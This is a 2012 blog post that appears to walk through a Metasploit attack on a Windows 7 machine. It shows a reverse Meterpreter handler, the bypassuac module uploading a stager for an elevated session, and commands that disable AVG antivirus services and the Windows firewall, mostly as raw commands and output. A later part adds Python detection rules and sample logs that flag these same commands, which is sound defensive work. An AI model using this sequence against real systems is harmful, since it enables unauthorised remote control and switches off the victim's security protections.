bits n' bytes
Monday, February 13, 2012
Meterpreter Bypass windows 7 UAC, Cripple down AVG and Windows built-in Firewall
Handler
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.0.9
lhost => 192.168.0.9
msf exploit(handler) > set lport 1111
lport => 1111
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.9:1111
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.0.10
[*] Meterpreter session 1 opened (192.168.0.9:1111 -> 192.168.0.10:49156) at 2012-02-13 17:04:18 +0800

meterpreter > shell
Process 1360 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>sc query avgwd
sc query avgwd

SERVICE_NAME: avgwd
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Windows\system32>sc config avgwd start= disabled
sc config avgwd start= disabled
[SC] OpenService FAILED 5:

Access is denied.
Bypassuac
C:\Windows\system32>exit

meterpreter > background
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options (post/windows/escalate/bypassuac):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     no        Listener IP address for the new session
   LPORT    4444             no        Listener port for the new session
   SESSION                   yes       The session to run this module on.

msf post(bypassuac) > set lhost 192.168.0.9
lhost => 192.168.0.9
msf post(bypassuac) > set lport 1111
lport => 1111
msf post(bypassuac) > set session 1
session => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.0.9:1111
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (752128 bytes) to 192.168.0.10
[*] Meterpreter session 2 opened (192.168.0.9:1111 -> 192.168.0.10:49184) at 2012-02-13 17:06:03 +0800
[*] Session ID 2 (192.168.0.9:1111 -> 192.168.0.10:49184) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rzHopEHJDLdv.exe (2504)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2488

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >
Disabling AVG services at startup: avgwd and AVGIDSAgent

meterpreter > execute -f cmd.exe -c -H
Process 568 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\System32>sc config avgwd start= disabled
sc config avgwd start= disabled
[SC] ChangeServiceConfig SUCCESS

C:\Windows\System32>sc config AVGIDSAgent start= disabled
sc config AVGIDSAgent start= disabled
[SC] ChangeServiceConfig SUCCESS
Disable Firewall
C:\Windows\System32>netsh firewall set opmode mode= disable
netsh firewall set opmode mode= disable

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Ok.
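Seen from the defender's side, the three steps above leave a very plain trail: the same `sc config avgwd start= disabled` command is first denied from the medium-integrity shell and then succeeds after elevation, and the firewall is switched off with a one-line `netsh` command. Both attempts and successes show up in process-creation records (Security event 4688 with command-line auditing enabled, or Sysmon event 1). The following Python is an added detection example, not code from the post or from Metasploit: it matches the exact command forms shown on the page, plus the `netsh advfirewall` syntax the deprecation notice points to, over a constructed set of sample records. The protected-service list and the record layout are assumptions.

```python
import re
from typing import Optional

# Service names the post shows being switched off. In a real deployment this
# set is built from the security products actually installed (assumed config).
PROTECTED_SERVICES = {"avgwd", "avgidsagent"}

# "sc config <svc> start= disabled" as typed on the page (the space after "="
# is optional), with or without a path prefix or ".exe" suffix.
SC_CONFIG_START = re.compile(
    r"^\s*(?:\S*\\)?sc(?:\.exe)?\s+config\s+(?P<svc>\S+)\s+start\s*=\s*(?P<mode>\S+)",
    re.IGNORECASE,
)

# The deprecated "netsh firewall set opmode mode= disable" form from the page
# and the newer "netsh advfirewall set <profile> state off" form it refers to.
NETSH_FIREWALL_OFF = re.compile(
    r"^\s*(?:\S*\\)?netsh(?:\.exe)?\s+(?:"
    r"firewall\s+set\s+opmode\s+mode\s*=\s*disable"
    r"|advfirewall\s+set\s+\S+\s+state\s+off)",
    re.IGNORECASE,
)


def classify(cmdline: str) -> Optional[str]:
    """Return an alert label for a suspicious command line, or None if benign."""
    m = SC_CONFIG_START.match(cmdline)
    if m:
        svc = m.group("svc").lower()
        mode = m.group("mode").lower()
        # Changing a security service to disabled or manual start is the
        # action shown on the page; other services and "auto" are left alone.
        if svc in PROTECTED_SERVICES and mode in {"disabled", "demand"}:
            return f"security-service-tamper:{svc}"
        return None
    if NETSH_FIREWALL_OFF.match(cmdline):
        return "host-firewall-disabled"
    return None


def scan(records):
    """Run classify() over process-creation records and collect the alerts."""
    alerts = []
    for rec in records:
        label = classify(rec["cmdline"])
        if label:
            alerts.append({
                "ts": rec["ts"],
                "user": rec["user"],
                "parent": rec["parent"],
                "label": label,
                "cmdline": rec["cmdline"],
            })
    return alerts


# Constructed sample records (not logs from the post). The fields mirror what
# a 4688 record with command-line auditing, or a Sysmon event 1, would carry.
SAMPLE_RECORDS = [
    {"ts": "17:04:50", "user": "WIN7\\alice", "parent": "cmd.exe",
     "cmdline": "sc query avgwd"},
    # The denied attempt from the medium-integrity shell is still logged.
    {"ts": "17:04:55", "user": "WIN7\\alice", "parent": "cmd.exe",
     "cmdline": "sc config avgwd start= disabled"},
    {"ts": "17:06:30", "user": "WIN7\\alice", "parent": "cmd.exe",
     "cmdline": "sc config avgwd start= disabled"},
    {"ts": "17:06:35", "user": "WIN7\\alice", "parent": "cmd.exe",
     "cmdline": "sc config AVGIDSAgent start= disabled"},
    {"ts": "17:07:00", "user": "WIN7\\alice", "parent": "cmd.exe",
     "cmdline": "netsh firewall set opmode mode= disable"},
    {"ts": "17:07:10", "user": "WIN7\\alice", "parent": "cmd.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    # Benign: an unrelated service being set back to automatic start.
    {"ts": "17:09:00", "user": "NT AUTHORITY\\SYSTEM", "parent": "services.exe",
     "cmdline": "sc config wuauserv start= auto"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_RECORDS):
        print(alert)
```

Command-line auditing catches the attempt even when, as in the first `sc config` call on the page, the service control manager refuses it, so the rule fires before the elevation step succeeds. The successful change is corroborated in the System log, where the Service Control Manager writes event 7040 ("The start type of the ... service was changed from auto start to disabled"), which makes a second, independent signal for the same tampering.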
1 comment:
Vikram Mann
November 25, 2012 at 12:26 AM
very nice explanation... thank you